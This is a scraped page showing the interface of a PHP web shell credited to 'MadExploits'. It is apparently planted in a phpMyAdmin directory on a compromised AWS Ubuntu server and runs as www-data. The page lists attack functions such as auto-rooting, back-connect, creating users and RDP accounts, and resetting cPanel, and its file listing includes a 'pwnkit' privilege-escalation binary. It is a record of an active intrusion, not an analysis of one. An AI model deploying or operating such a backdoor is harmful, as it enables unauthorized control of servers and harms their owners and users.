Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.117.189.143
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Http /
Handler /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ApplicationHandler.php
970
B
-rw-r--r--
QueueRequestHandler.php
959
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ApplicationHandler.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Http\Handler; use PhpMyAdmin\Application; use PhpMyAdmin\Exceptions\ExitException; use PhpMyAdmin\Http\ServerRequest; use PhpMyAdmin\ResponseRenderer; use Psr\Http\Message\ResponseInterface; use Psr\Http\Message\ServerRequestInterface; use Psr\Http\Server\RequestHandlerInterface; use function assert; final class ApplicationHandler implements RequestHandlerInterface { public function __construct(private readonly Application $application) { } public function handle(ServerRequestInterface $request): ResponseInterface { assert($request instanceof ServerRequest); try { $response = $this->application->handle($request); if ($response === null) { throw new ExitException(); } } catch (ExitException) { $response = ResponseRenderer::getInstance()->response(); } return $response; } }
Close